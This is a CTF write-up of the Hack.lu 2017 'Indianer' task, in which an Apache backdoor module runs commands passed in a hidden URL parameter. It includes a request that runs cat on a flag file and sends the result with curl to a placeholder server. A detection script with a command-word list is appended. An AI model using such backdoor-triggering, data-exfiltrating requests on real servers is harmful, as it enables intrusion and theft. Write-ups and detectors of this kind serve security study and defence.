Hack.lu CTF 2017 / Indianer
October 19, 2017
Hello guys,
I will explain my team's solution for this task.
It was a really amazing task because it is reverse + web, so it needs a lot of knowledge to solve.
So first we check the task!
Next we have a backdoor.so library used with the Apache server.
To solve this we should first understand how backdoor.so works.
So it first checks for GET\x00ndex.html
OK, so we need to send https://indianer.flatearth.fluxfingers.net//x00ndex.html first to make it all work.
Then there is a system function that gets its argument from the URL, but it's not clear what the name of this arg is,
so we made our prog to get the arg name,
and it was "dpdpdpamamamamajvjvjvjvgsgsgsgsgpdp". So this is the second part:
https://indianer.flatearth.fluxfingers.net/x00ndex.html?dpdpdpamamamamajvjvjvjvgsgsgsgsgpdp=
What next?
First, what we tried to do was to understand where the flag will be shown.
We first tried a simple check like https://indianer.flatearth.fluxfingers.net/x00ndex.html_dpdpdpamamamamajvjvjvjvgsgsgsgsgpdp=ls
but for sure no output there :(
After some checks we found that the '_' is replaced with ' '.
So there is no need for a space here.
Also, the flag will not be shown here in the web part.
So if we redirect the flag somewhere, it may work.
So curl is the best solution, but we figured this out when the CTF had already ended :( and we didn't get any points for this task.
Anyway, it was a cool task to improve our skills.
OK, let's continue!
So we need curl? OK, so we will send the flag to our server using curl.
So our last solution was to make this request, and it works :D
https://indianer.flatearth.fluxfingers.net/x00ndex.html?dpdpdpamamamamajvjvjvjvgsgsgsgsgpdp=curl_serverip/cat_/var/www/flag.txt
No points but we did it :D
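A defender's view of the same requests, as an added example that is not part of the original write-up: it scans Apache access-log lines for the path and parameter name described above, applies the '_' to ' ' substitution, and flags command names in the value. The log lines are constructed and the command-word list is an assumption.

```python
import re
from urllib.parse import parse_qsl

# Indicators copied from the write-up above.
MAGIC_PATH = "x00ndex.html"
MAGIC_PARAM = "dpdpdpamamamamajvjvjvjvgsgsgsgsgpdp"
# Assumption: command names worth flagging; extend for your environment.
COMMAND_WORDS = {"ls", "cat", "curl", "wget", "id", "sh", "bash"}
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def decode_value(value):
    """Apply the substitution the write-up observed: '_' becomes ' '."""
    return value.replace("_", " ")

def inspect_line(line):
    """Return the findings for one access-log line (empty list if clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    # Split by hand: urlsplit() would read a leading '//' as a host name.
    path, _, query = m.group("target").partition("?")
    findings = ["magic-path"] if MAGIC_PATH in path else []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name != MAGIC_PARAM:
            continue
        findings.append("magic-param")
        words = re.split(r"[\s/]+", decode_value(value))
        hits = sorted(COMMAND_WORDS.intersection(words))
        if hits:
            findings.append("command:" + ",".join(hits))
    return findings

def scan(lines):
    """Return (line_number, findings) for every suspicious line."""
    results = [(n, inspect_line(l)) for n, l in enumerate(lines, 1)]
    return [(n, f) for n, f in results if f]

# Constructed sample log lines (192.0.2.10 is a documentation address).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Oct/2017:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.10 - - [19/Oct/2017:10:00:05 +0000] "GET //x00ndex.html HTTP/1.1" 200 512',
    '192.0.2.10 - - [19/Oct/2017:10:00:09 +0000] "GET /x00ndex.html?' + MAGIC_PARAM
    + '=curl_serverip/cat_/var/www/flag.txt HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(findings)}")
```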
Thanks